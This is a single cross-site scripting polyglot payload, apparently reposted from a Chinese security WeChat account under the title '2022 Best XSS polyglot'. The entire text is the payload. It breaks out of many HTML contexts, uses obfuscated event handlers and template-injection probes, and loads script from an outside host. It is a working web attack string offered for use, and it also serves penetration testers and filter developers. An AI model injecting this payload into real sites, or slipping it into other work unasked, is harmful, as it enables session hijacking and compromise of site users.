‘”onclick=(cou006efirm)?.`0`><sVg/i=”${{7*7}}”oNload=” 0>(prou006dpt)`1`”></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/–><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//xSs></scripT>
原文始发于微信公众号(Khan安全攻防实验室):2022 Best XSS polyglot